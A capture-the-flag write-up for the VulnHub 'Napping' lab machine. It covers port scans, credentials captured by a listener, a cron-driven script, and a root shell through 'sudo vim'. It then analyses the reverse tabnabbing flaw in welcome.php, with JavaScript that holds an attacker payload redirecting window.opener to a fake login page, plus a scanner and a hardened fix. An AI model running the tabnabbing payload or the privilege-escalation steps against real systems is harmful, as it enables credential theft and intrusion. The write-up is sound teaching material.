┌──(mikannse㉿kali)-[~/vulnhub]
└─$ sudo nmap --min-rate=10000 -p- 192.168.56.132
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-15 21:06 CST
Nmap scan report for 192.168.56.132
Host is up (0.0012s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:49:EE:4D (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 50.29 seconds
┌──(mikannse㉿kali)-[~/vulnhub]
└─$ sudo nmap -sT -sC -sV -O -p22,80 192.168.56.132
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-15 21:08 CST
Nmap scan report for 192.168.56.132
Host is up (0.0015s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 24:c4:fc:dc:4b:f4:31:a0:ad:0d:20:61:fd:ca:ab:79 (RSA)
|   256 6f:31:b3:e7:7b:aa:22:a2:a7:80:ef:6d:d2:87:6c:be (ECDSA)
|_  256 af:01:85:cf:dd:43:e9:8d:32:50:83:b2:41:ec:1d:3b (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-title: Login
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:49:EE:4D (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.57 seconds

Only SSH and HTTP are exposed. The OSScan warning is expected here: -p22,80 restricted the scan to the two open ports, and OS fingerprinting also wants a closed port to probe, so the kernel range is only a rough guess. Two details worth remembering for later: the web root is a login page (http-title: Login), and PHPSESSID is issued without the HttpOnly flag.
┌──(mikannse㉿kali)-[~/vulnhub/napping]
└─$ nc -lvnp 8000
listening on [any] 8000 ...
connect to [192.168.56.131] from (UNKNOWN) [192.168.56.132] 41724
POST / HTTP/1.1
Host: 192.168.56.131:8000
User-Agent: python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 45
Content-Type: application/x-www-form-urlencoded

username=daniel&password=C%40ughtm3napping123
URL-decoding the body gives daniel:C@ughtm3napping123. Note the User-Agent: the client that posted the login form to our listener is a python-requests script running on the target (192.168.56.132), not a person in a browser.

These credentials work for SSH.
Lateral movement
config.php
<?php
/* Database credentials. Assuming you are running MySQL server with
default setting (user 'root' with no password) */
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'adrian');
define('DB_PASSWORD', 'P@sswr0d456');
define('DB_NAME', 'website');

/* Attempt to connect to MySQL database */
$mysqli = new mysqli(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME);

// Check connection
if($mysqli === false){
    die("ERROR: Could not connect. " . $mysqli->connect_error);
}
?>
Connecting to the database with these credentials turned up nothing else of interest.

adrian's home directory contains a query.py:
from datetime import datetime
import requests

now = datetime.now()

r = requests.get('http://127.0.0.1/')
if r.status_code == 200:
    f = open("site_status.txt","a")
    dt_string = now.strftime("%d/%m/%Y %H:%M:%S")
    f.write("Site is Up: ")
    f.write(dt_string)
    f.write("\n")
    f.close()
else:
    f = open("site_status.txt","a")
    dt_string = now.strftime("%d/%m/%Y %H:%M:%S")
    f.write("Check Out Site: ")
    f.write(dt_string)
    f.write("\n")
    f.close()
Alongside it is the site_status.txt the script appends to:

Site is Up: 14/09/2024 01:54:01
Site is Up: 14/09/2024 01:56:01
Site is Up: 15/09/2024 13:06:01
Site is Up: 15/09/2024 13:08:01
Site is Up: 15/09/2024 13:10:01
Site is Up: 15/09/2024 13:12:02
Site is Up: 15/09/2024 13:14:01
Site is Up: 15/09/2024 13:16:02
Site is Up: 15/09/2024 13:18:01
Site is Up: 15/09/2024 13:20:01

The entries are exactly two minutes apart, so query.py is being run on a schedule (a cron job or timer) in adrian's context rather than by hand. A script that another account executes unattended is always worth a close look at its permissions before moving on.
adrian@napping:/opt$ sudo -l
Matching Defaults entries for adrian on napping:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User adrian may run the following commands on napping:
    (root) NOPASSWD: /usr/bin/vim
adrian may run vim as root without a password, and vim can spawn an arbitrary command with :!, so launching a shell from it yields a root shell. Privilege escalation done:

adrian@napping:~$ sudo vim -c ':!/bin/sh'
BeyondROOT
How does this machine simulate the phishing victim?

welcome.php stores each submitted URL in the links table of the database:
<?php
<SNIP>
$mysqli = new mysqli("localhost", "adrian", "P@sswr0d456", "website");

// Check connection
if($mysqli === false){
    die("ERROR: Could not connect. " . $mysqli->connect_error);
}

if(isset($_POST['submit'])){ //check if form was submitted
    $input = $mysqli->real_escape_string($_POST['url']);
    $sql = "INSERT INTO links (link) VALUES ('$input')";
    if($mysqli->query($sql) === true){
        $message = "Thank you for your submission, you have entered: <a href='$input' target='_blank' >Here</a>";
    }
    else{
        $message = "It is totally free!";
    }
}else{
    $message = "It is totally free!";
<SNIP>

Two things stand out. real_escape_string() only neutralises the value for the SQL INSERT; the same $input is then written straight into an href attribute with no HTML-context encoding. More importantly for this box, the stored link is rendered with target='_blank' and no rel="noopener", so whatever page the URL points to opens in a new tab that still holds a window.opener reference to the tab that opened it. That is the reverse tabnabbing primitive: script on the attacker's page can set window.opener.location to a look-alike login page, and a victim who "logs in" there hands over credentials, which is what the POST to our listener on port 8000 was.
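As an added example (not code from the writeup or from the Napping machine), the snippet below shows both halves of the issue in JavaScript: the script an attacker's page would run once opened through the unsafe link, a small scanner that flags anchors opening a new window without severing window.opener, and the hardened rendering welcome.php should use instead. The listener address is the one from the nc session above; the /login.php path on the attacker host is an assumption, and the sample HTML is constructed from welcome.php's success branch.

```javascript
// Added example (not from the writeup or the Napping box): reverse tabnabbing
// through welcome.php's link rendering, and how to find and fix it.
//
// welcome.php echoes a user-submitted URL as
//   <a href='$input' target='_blank'>Here</a>
// With target="_blank" and no rel="noopener", the opened page receives a live
// window.opener reference and can navigate the tab that opened it.

// The script an attacker hosts at the submitted URL. 192.168.56.131:8000 is
// the listener from the nc session; the /login.php path is an assumption.
const tabnabPayload = `
<script>
  if (window.opener) {
    // Send the victim's original tab to our look-alike login page.
    window.opener.location = "http://192.168.56.131:8000/login.php";
  }
</script>`;

// Scanner: return the href of every <a> that opens a new window without
// severing window.opener. rel="noreferrer" implies noopener, so both count as
// safe. Regex-based so it runs in plain Node without a DOM library; adequate
// for server-rendered fragments like the one above, not a full HTML5 parser.
function findTabnabbableLinks(html) {
  const attr = (tag, name) => {
    const re = new RegExp(`\\b${name}\\s*=\\s*(?:"([^"]*)"|'([^']*)'|([^\\s>]+))`, 'i');
    const m = tag.match(re);
    return m ? (m[1] ?? m[2] ?? m[3]) : null;
  };
  const unsafe = [];
  for (const tag of html.match(/<a\b[^>]*>/gi) || []) {
    if ((attr(tag, 'target') || '').toLowerCase() !== '_blank') continue;
    const rel = (attr(tag, 'rel') || '').toLowerCase().split(/\s+/);
    if (rel.includes('noopener') || rel.includes('noreferrer')) continue;
    unsafe.push(attr(tag, 'href'));
  }
  return unsafe;
}

// Hardened rendering: sever the opener reference and encode the attribute
// value for the HTML context (real_escape_string only covers the SQL context).
function renderSafeLink(href) {
  const esc = (s) => s.replace(/&/g, '&amp;').replace(/"/g, '&quot;')
                      .replace(/</g, '&lt;').replace(/>/g, '&gt;');
  return `<a href="${esc(href)}" target="_blank" rel="noopener noreferrer">Here</a>`;
}

// Constructed input: what welcome.php's success branch renders for a
// submitted attacker URL.
const welcomeOutput =
  "Thank you for your submission, you have entered: " +
  "<a href='http://192.168.56.131/' target='_blank' >Here</a>";

console.log(findTabnabbableLinks(welcomeOutput));                              // ['http://192.168.56.131/']
console.log(findTabnabbableLinks(renderSafeLink('http://192.168.56.131/')));   // []
```

Running it with `node` prints the unsafe href from the original markup and an empty list for the hardened version. The scanner is deliberately lenient about attribute quoting and case, since the same bug hides behind `target=_blank` and `TARGET="_Blank"` just as well.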